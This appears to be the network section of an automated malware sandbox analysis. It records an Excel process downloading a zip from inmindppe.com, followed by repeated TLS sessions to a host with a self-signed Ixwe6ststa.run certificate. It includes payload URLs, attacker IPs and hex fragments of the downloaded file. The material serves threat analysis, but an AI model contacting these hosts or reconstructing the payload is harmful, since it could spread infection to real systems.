Jan 11, 2021 16:54:24.678972960 CET	3389	49405	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:24.679183960 CET	49405	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:24.680701017 CET	49405	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:24.735161066 CET	3389	49405	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:24.755333900 CET	3389	49405	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:24.755371094 CET	3389	49405	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:24.755544901 CET	49405	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:24.767287016 CET	49405	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:24.831994057 CET	3389	49405	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:24.832273006 CET	49405	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:24.842653990 CET	49405	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:24.842911959 CET	49405	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:24.896915913 CET	3389	49405	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:24.897008896 CET	49405	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:24.936652899 CET	3389	49405	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:24.950730085 CET	3389	49405	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:24.950751066 CET	3389	49405	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:25.041565895 CET	3389	49405	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:25.041609049 CET	3389	49405	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:25.041805983 CET	49405	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:25.044378042 CET	49405	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:25.098248959 CET	3389	49405	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:25.154023886 CET	49406	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:25.206661940 CET	1512	49406	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:25.206773043 CET	49406	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:25.207905054 CET	49406	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:25.260417938 CET	1512	49406	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:25.267657995 CET	1512	49406	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:25.267671108 CET	1512	49406	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:25.267813921 CET	49406	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:25.274946928 CET	49406	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:25.328918934 CET	1512	49406	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:25.329061031 CET	49406	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:25.333874941 CET	49406	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:25.334029913 CET	49406	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:25.386538982 CET	1512	49406	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:25.386742115 CET	49406	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:25.424736023 CET	1512	49406	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:25.440340996 CET	1512	49406	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:25.539577007 CET	1512	49406	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:25.539591074 CET	1512	49406	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:25.539679050 CET	49406	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:25.539726019 CET	49406	1512	192.168.2.22	46.105.131.65

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2021 16:52:11.303742886 CET	52197	53	192.168.2.22	8.8.8.8
Jan 11, 2021 16:52:11.368813992 CET	53	52197	8.8.8.8	192.168.2.22
Jan 11, 2021 16:52:16.102725983 CET	53099	53	192.168.2.22	8.8.8.8
Jan 11, 2021 16:52:16.159302950 CET	53	53099	8.8.8.8	192.168.2.22
Jan 11, 2021 16:52:16.173299074 CET	52838	53	192.168.2.22	8.8.8.8
Jan 11, 2021 16:52:16.232958078 CET	53	52838	8.8.8.8	192.168.2.22
Jan 11, 2021 16:52:48.119407892 CET	61200	53	192.168.2.22	8.8.8.8
Jan 11, 2021 16:52:48.167299032 CET	53	61200	8.8.8.8	192.168.2.22
Jan 11, 2021 16:52:48.184457064 CET	49548	53	192.168.2.22	8.8.8.8
Jan 11, 2021 16:52:48.232584000 CET	53	49548	8.8.8.8	192.168.2.22
Jan 11, 2021 16:52:49.228758097 CET	55627	53	192.168.2.22	8.8.8.8
Jan 11, 2021 16:52:49.276504040 CET	53	55627	8.8.8.8	192.168.2.22
Jan 11, 2021 16:52:49.288161993 CET	56009	53	192.168.2.22	8.8.8.8
Jan 11, 2021 16:52:49.338207960 CET	53	56009	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 11, 2021 16:52:11.303742886 CET	192.168.2.22	8.8.8.8	0x7e45	Standard query (0)	inmindppe.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Jan 11, 2021 16:52:11.368813992 CET	8.8.8.8	192.168.2.22	0x7e45	No error (0)	inmindppe.com	160.153.133.116	A (IP address)	IN (0x0001)
Jan 11, 2021 16:52:49.276504040 CET	8.8.8.8	192.168.2.22	0xa163	No error (0)	cdn.digicertcdn.com	104.18.10.39	A (IP address)	IN (0x0001)
Jan 11, 2021 16:52:49.276504040 CET	8.8.8.8	192.168.2.22	0xa163	No error (0)	cdn.digicertcdn.com	104.18.11.39	A (IP address)	IN (0x0001)
Jan 11, 2021 16:52:49.338207960 CET	8.8.8.8	192.168.2.22	0x5489	No error (0)	cdn.digicertcdn.com	104.18.10.39	A (IP address)	IN (0x0001)
Jan 11, 2021 16:52:49.338207960 CET	8.8.8.8	192.168.2.22	0x5489	No error (0)	cdn.digicertcdn.com	104.18.11.39	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

inmindppe.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49167	160.153.133.116	80	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
Jan 11, 2021 16:52:11.434149027 CET	0	OUT	GET /eb3kd1le.zip HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: inmindppe.com Connection: Keep-Alive
Jan 11, 2021 16:52:11.492672920 CET	2	IN	HTTP/1.1 200 OK Date: Mon, 11 Jan 2021 15:52:11 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, Keep-Alive Last-Modified: Thu, 19 Nov 2020 20:01:43 GMT ETag: "c0582-4de00-5b47b3264d7c0-gzip" Accept-Ranges: bytes Vary: Accept-Encoding,User-Agent Content-Encoding: gzip Keep-Alive: timeout=5 Transfer-Encoding: chunked Content-Type: application/zip Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec fd 09 54 14 47 f8 37 0a 57 37 20 20 e8 a0 82 83 82 4a 98 d6 51 d9 66 c1 2d 68 44 c1 2d a0 8e 20 0c 0a 2a ca 32 e3 88 42 60 88 0b 28 18 86 28 36 13 8d 82 a3 42 dc 50 31 6e 80 a0 22 a8 e0 8a 06 14 c4 65 8c 90 48 dc a6 15 17 a2 c6 5d fa 3e 35 83 c9 4c fe ef 7b ef f7 9d 73 bf 73 ef 39 5f f0 3c f6 d3 55 d5 bf ae ae 7a ea a9 5f 55 57 d7 4c 9e b9 0e 99 21 84 cc 41 58 16 a1 72 64 f8 f3 45 ff d7 7f e9 20 5d fb 55 74 45 65 d6 97 bf 28 27 02 2f 7f 31 5d 3e 3f c9 25 21 31 5e 96 38 77 a1 4b d4 dc 45 8b e2 95 2e f3 62 5c 12 93 17 b9 cc 5f e4 e2 3f 35 d8 65 61 7c 74 8c 67 97 2e 9d a9 0e 0c c9 38 84 02 09 6b 34 2d f6 e3 9c cf b8 2d a8 eb 17 36 04 29 42 cb 20 57 91 86 b0 86 01 f0 9f dd df 19 b3 d3 eb a4 21 df 08 fd 73 44 be 16 7f 9f 90 1d 49 f5 69 ff 3e fe 7d d0 ff 6d fa 0e a1 6c bd 66 81 52 3d ff 17 0f 29 b0 40 03 ad ff 3f 28 8c 7f fd 15 7f 0f b8 66 ff fb 78 4f 65 cc 12 25 1c 5f 50 1d 19 c2 cf 67 6e 9a c6 05 9e de 33 31 7a ae 72 2e 42 7f e0 00 5f 64 78 a8 c1 a6 e9 20 d8 d7 90 4e 8c 6e e1 7b 4a 3a b0 dc ff 17 e9 44 06 bd 33 fe 2f b2 03 4f f0 bf c3 13 19 d2 25 74 a4 13 fd 2f d2 19 b2 87 26 3a 21 83 41 38 83 78 ff 8f 74 d5 fa e7 85 f0 ba 20 c8 d8 76 08 9c 6e 6e c8 a7 e9 f3 c2 7d 93 12 a3 40 37 d4 85 85 21 6f bb 4c 0b c6 90 bf 98 b8 78 48 a8 af 1b a8 23 7d 46 af ff 8f 74 63 d1 7f 7f ff a7 7f 21 f4 93 69 a1 f4 38 db ac 71 1f e9 2e 76 79 c8 2e 6b b2 95 3c a2 1b 42 0a c4 3a 28 d3 91 1d 1d f2 51 5d 46 c6 ee e8 84 4c 82 cd da e8 71 56 66 02 7a b2 55 96 90 0e b1 a2 49 0f 9c 04 9f 12 b3 e9 07 b3 ce d6 75 fc 61 fc 1d d5 5b 00 17 6e 10 f3 31 8c 66 76 34 c3 99 64 47 19 fe 9f 6e fc ff ea 9f 43 39 5c c4 de fd 37 7e cd b8 8f 7f 56 20 04 19 a2 7d 25 c6 91 86 f8 7f 9f 4f db c1 00 0c 3d f1 63 d6 e4 8f f0 74 59 0e 7b f1 29 64 0f 5f 09 f1 f8 11 eb 56 23 bb ff 8e ff 1d ff 3b fe 77 fc ef f8 df f1 bf e3 7f c7 ff 8e ff 1d ff 3b fe 77 fc ef f8 df f1 bf e3 ff ff 1c e5 ce 76 08 d4 06 50 59 87 e2 ef 91 5d c6 db 4e 4a f2 f2 30 fd bc 42 08 fd 64 07 9e 3f 28 b0 cf 83 94 4b d2 e1 bf d5 e9 38 61 19 24 94 b0 0e e5 70 28 70 84 b8 72 5f 84 90 e4 38 9e cf 9a c6 0e c1 a9 d9 21 af f0 74 c6 10 1c 3b 83 ee 82 0f 74 f5 ff d5 3f f9 b1 2f 90 dd b4 b3 05 ce 38 75 17 fc 7f 56 97 27 78 fe 42 3f 8b 91 e5 70 00 fe af b1 c0 f3 24 a7 0e 20 b4 03 2b b4 3e 81 3a 87 d8 5e 65 86 b2 f4 73 28 fa 70 0f 9c a2 40 7f 8a 71 0c d3 24 f0 3c 19 4f 6c 77 24 64 e1 19 9b 57 35 e3 de e6 e0 39 a0 c9 6f 2f 10 f9 74 c8 5b ce 51 32 83 11 c3 e9 6a 02 ce 2e 8c 25 76 d0 e3 20 70 22 91 f1 48 0c 01 ab bf 26 e0 fc 82 2f 59 08 49 38 47 a7 91 19 8f c5 10 b0 5a 42 62 84 31 66 9b f4 10 63 cd 3a 30 c6 98 e9 41 cc 77 1b 40 cc 3f 83 98 eb 41 2c 36 1b 40 2c 3e 83 58 e8 41 3a e5 18 40 3a 7d 06 e9 a4 07 b1 dc 68 00 b1 fc 0c 62 a9 07 b1 da 64 00 b1 fa 0c 62 a5 07 b1 5e 6b 00 b1 fe 0c 62 ad 07 e9 7c c8 00 d2 f9 33 48 67 3d 88 4d ae 01 c4 e6 33 88 8d 1e c4 36 da 00 62 fb 19 c4 56 0f d2 25 ce 00 d2 e5 33 48 17 Data Ascii: 1faaTG7W7 JQf-hD- *2B`((6BP1n"eH]>5L{ss9_<Uz_UWL!AXrdE ]UtEe('/1]>?%!1^8wKE.b\_?5ea\|tg.8k4--6)B W!sDIi>}mlfR=)@?(fxOe%_Pgn31zr.B_dx Nn{J:D3/O%t/&:!A8xt vnn}@7!oLxH#}Ftc!i8q.vy.k<B:(Q]FLqVfzUIua[n1fv4dGnC9\7~V }%O=ctY{)d_V#;w;wvPY]NJ0Bd?(K8a$p(pr_8!t;t?/8uV'xB?p$ +>:^es(p@q$<Olw$dW59o/t[Q2j.%v p"H&/YI8GZBb1fc:0Aw@?A,6@,>XA:@:}hbdb^kb\|3Hg=M36bV%3H
Jan 11, 2021 16:52:11.493716955 CET	3	IN	Data Raw: 3d 48 d7 f9 06 90 ae 9f 41 ba ea 41 38 b9 06 10 ce 67 10 8e 1e c4 2e c6 00 62 f7 19 c4 4e 0f d2 6d 81 01 a4 db 67 90 6e 7a 90 ee 0a 03 48 f7 cf 20 dd f5 20 3d 22 0d 20 3d 3e 83 f4 d0 83 d8 77 3c 8e fd 67 10 7b 3d 88 43 47 c1 3a 7c 06 71 d0 83 f4 Data Ascii: =HAA8g.bNmgnzH =" =>w<g{=CG:\|q5S@AzHgG=HhH ?8ug'=s3Og>z3H_=H~AA\ .A\ _l4\|=kG~q: gJqc
Jan 11, 2021 16:52:11.495330095 CET	4	IN	Data Raw: 88 1d 88 3d 88 23 88 33 88 0b 08 05 32 10 c4 1d 44 00 e2 0d 32 1c 64 24 88 2f 88 3f c8 44 90 40 10 09 4e 0b ad d6 1d 44 00 e2 0d 32 1c 64 24 88 2f 88 3f 88 12 9e 61 09 48 2a 48 3a 88 0a 64 35 48 36 c8 3a 90 1c 90 4d 20 f9 20 db 41 76 81 ec 05 39 Data Ascii: =#32D2d$/?D@ND2d$/?aH*H:d5H6:M Av92@"@"W'r8%TtjGw d:HHH$H4~q$$D$dH&\| @A@ANTw@ii<iy#~ V v . @w7p
Jan 11, 2021 16:52:11.497365952 CET	6	IN	Data Raw: 44 02 32 1b 24 01 e4 3b 90 f5 20 bb 40 0e 83 5c 04 69 06 f9 08 62 07 6d c8 1d 24 10 64 36 48 22 c8 0f 20 f9 20 07 40 4e 80 d4 6d 32 dc eb 3e 1c df 83 d8 6f 86 ba 03 19 0e 32 05 24 12 24 15 64 3d c8 01 90 53 20 37 41 18 90 f7 20 5d a1 fd b9 80 08 Data Ascii: D2$; @\ibm$d6H" @Nm2>o2$$d=S 7A ]@m1)fm_[S[\|HLQMRKLOnG?/qn1AB$1>jLttbLRBb&]#5TpEDS/@@]qKlo'/ZHLH$E/1f2
Jan 11, 2021 16:52:11.505867958 CET	7	IN	Data Raw: f8 b4 28 a8 e8 64 5c 1a d3 e3 3f df 10 a9 90 7f 74 8c 24 3e 49 39 26 fa db f9 60 2b 1f c9 8e 7e 78 d2 22 70 18 93 f4 6d 72 2f ce 43 07 b0 0c 6c 7d bc de bb 63 58 28 33 fd ad a6 40 be 17 82 57 c4 81 08 7c d7 e7 a7 30 5c f4 4f ff 7b 09 9e d8 10 06 Data Ascii: (d\?t$>I9&`+~x"pmr/Cl}cX(3@W\|0\O{)WJG''Y/e8!I1`K(hK~;pxon"k\|:/~nbt;gNtLT&U'N4y!<d(Le\|~?>x
Jan 11, 2021 16:52:11.505964994 CET	9	IN	Data Raw: d9 d1 71 4e df 40 d8 37 89 31 77 fc 63 c6 6b 23 62 c6 ac e8 b8 d7 c1 60 25 3e 97 5c 95 1a 83 2f 52 16 8c d5 c7 4b 0f 48 95 31 e5 52 43 1e 0c e2 17 f7 e3 98 98 89 73 00 33 fc 73 58 72 8c 52 14 bc 30 c1 73 aa 52 3e ba 23 6c f0 18 65 a2 6b f0 a2 cf Data Ascii: qN@71wck#b`%>\/RKH1RCs3sXrR0sR>#lek1q]ANy3^3N8pKgE'?gyRbQB@%d^a:x#t,)T0D`c~.RY.QCg.1jl8-v+ ~
Jan 11, 2021 16:52:11.506048918 CET	9	IN	Data Raw: e2 cc ea ed c7 8a c1 37 d1 92 0d a2 db 74 5d f1 74 2a 63 e6 68 45 d0 5c 5a 12 df 74 e6 bd 54 4c df 7a fc 98 a3 2a 01 3f b3 e9 18 b5 1a fc 91 0b f8 9e 9a 3c 6e 76 87 ff c9 ca 0f 28 80 b6 17 6e 0c fe 64 fc 5e a9 fc b1 ff 88 30 c6 0f da dc cc 97 ca Data Ascii: 7t]tchE\ZtTLz?<nv(nd^0lE((uNvh'3vG\(s_i;n6PHueT!l]?I;Uw/^H0@hxUnGr'yj\_yb7zer
Jan 11, 2021 16:52:11.506277084 CET	11	IN	Data Raw: 31 66 61 30 0d 0a 65 e5 d9 a5 d6 84 3b a5 23 ad 97 05 48 8d 8a 2e 86 72 01 ee a0 91 3e 19 3f 30 5c fe d8 7b 54 18 f3 1c ca b7 f7 73 65 df ee fb 29 15 f0 22 f5 35 48 2f f5 0a 52 70 a3 d5 39 34 f4 b3 b2 18 05 bb e1 05 ad 32 06 af dd 0f f5 f4 25 57 Data Ascii: 1fa0e;#H.r>?0\{Tse)"5H/Rp942%W&P?QBlTjmKa9T8+1JZM<QPuxT6e{e8q\|1x"L{&rLmH~/^A(hkC=)>/*\!]3\g~5^e
Jan 11, 2021 16:52:11.516563892 CET	12	IN	Data Raw: 2a a9 01 7d 02 e8 2c 05 f9 3b 58 dd 86 e3 02 8c c1 71 5c 5e 0a 29 1b 0d 79 7f 95 9d 9d 72 ce 1a c9 7a 72 9e 6f 1d dd 0d 6d 7a cb f3 2d 34 ab bb 35 69 f4 cd c0 94 8f ba 1b cd 42 94 21 dd 35 55 5d 10 56 66 cd f7 66 1e 7c 14 82 df 0f 2b b6 d6 89 99 Data Ascii: },;Xq\^)yrzromz-45iB!5U]Vff\|+qUI&2]8bg%>A,pj;lj?k):zmBUBHWv>/Z#0__]!B\|1cFwAEfH& 8
Jan 11, 2021 16:52:11.516774893 CET	14	IN	Data Raw: 2c eb b5 0e b8 25 d8 6e 25 e8 55 8b 21 4f 29 9c 15 da c2 18 ce 8c 72 6a 49 5f 01 92 5b 02 6f 5a 5f 0c f9 00 5e 33 da 1a f2 01 75 fb bc 17 e7 a6 c9 3b 8b 80 74 6b 9d 97 1c dd c4 73 35 e0 2b 0a bd 98 2c c5 60 f4 b2 98 f0 b5 5a ea 75 53 55 cb b7 46 Data Ascii: ,%n%U!O)rjI_[oZ_^3u;tks5+,`ZuSUFH4^e^TR-v?j@!<\|A1tbj='dyX{.eJ/E=9,%l`mfeMYC:ccxS0nM`0OO=/!
Jan 11, 2021 16:52:11.542587042 CET	15	IN	Data Raw: 60 ec ff ea 51 a9 47 20 b3 1c 79 a3 4c 1d 6b c5 06 48 56 77 d6 b8 d7 9d bd bf d7 64 78 9e 3f 0b b8 4a 40 b8 7c e9 e2 83 8f e5 27 cf ae 09 ab 9a f0 1c 49 9d 1a 32 63 50 6f 71 76 2f 15 b5 0d 9e a7 8b 47 70 b0 ee 5d 3b 5b 29 29 ee cc f7 96 b2 31 af Data Ascii: `QG yLkHVwdx?J@\|'I2cPoqv/Gp];[))1`<0FwSIJBXS!gBZDj@2lb)oIY+j:#sfu6K-c.F7zLZ}_LOxx')5OY+_NMI7vv$,a

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Jan 11, 2021 16:52:15.334491014 CET	77.220.64.37	443	192.168.2.22	49168	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:52:20.144717932 CET	77.220.64.37	443	192.168.2.22	49173	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:52:22.272886992 CET	77.220.64.37	443	192.168.2.22	49177	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:52:24.377834082 CET	77.220.64.37	443	192.168.2.22	49181	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:52:26.483844995 CET	77.220.64.37	443	192.168.2.22	49185	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:52:28.591475010 CET	77.220.64.37	443	192.168.2.22	49189	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:52:30.659601927 CET	77.220.64.37	443	192.168.2.22	49193	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:52:32.743416071 CET	77.220.64.37	443	192.168.2.22	49197	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:52:34.824404001 CET	77.220.64.37	443	192.168.2.22	49201	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:52:38.580311060 CET	77.220.64.37	443	192.168.2.22	49205	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:52:40.914674997 CET	77.220.64.37	443	192.168.2.22	49209	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:52:42.972027063 CET	77.220.64.37	443	192.168.2.22	49213	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:52:45.013258934 CET	77.220.64.37	443	192.168.2.22	49217	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:52:47.122772932 CET	77.220.64.37	443	192.168.2.22	49221	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:52:49.165604115 CET	77.220.64.37	443	192.168.2.22	49226	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:52:51.330600023 CET	77.220.64.37	443	192.168.2.22	49231	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:52:53.496804953 CET	77.220.64.37	443	192.168.2.22	49235	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:52:56.130652905 CET	77.220.64.37	443	192.168.2.22	49239	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:52:58.192353010 CET	77.220.64.37	443	192.168.2.22	49243	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
